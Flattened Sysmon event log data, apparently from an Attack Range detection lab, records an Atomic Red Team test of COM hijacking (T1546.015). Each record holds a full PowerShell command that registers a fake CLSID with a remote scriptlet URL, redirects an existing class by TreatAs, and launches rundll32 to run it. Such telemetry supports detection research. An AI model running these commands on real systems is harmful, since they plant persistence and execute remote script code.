/fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.117{D271FDA4-EFEA-6331-A6EA-020000007402}7244C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID /ve /T REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.107{D271FDA4-EFEA-6331-A5EA-020000007402}6876C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID /ve /T REG_SZ /d {00000001-0000-0000-0000-0000FEEDACDC} /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.098{D271FDA4-EFEA-6331-A4EA-020000007402}4984C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00 /ve /T REG_SZ /d AtomicTest /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""} 154100x800000000000000025995749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-26 18:31:06.087{D271FDA4-EFEA-6331-A3EA-020000007402}3540C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exe"C:\Windows\system32\reg.exe" add HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest /ve /T REG_SZ /d AtomicTest /fC:\Users\Administrator\AppData\Local\Temp\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD{D271FDA4-EFE9-6331-A1EA-020000007402}6080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /ve /T REG_SZ /d \""C:\WINDOWS\system32\scrobj.dll\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32\"" /v \""ThreadingModel\"" /T REG_SZ /d \""Apartment\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL\"" /ve /T REG_SZ /d \""https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID\"" /ve /T REG_SZ /d \""AtomicTest\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"" /f reg add \""HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs\"" /ve /T REG_SZ /d \""{00000001-0000-0000-0000-0000FEEDACDC}\"" /f rundll32.exe -sta \""AtomicTest\""}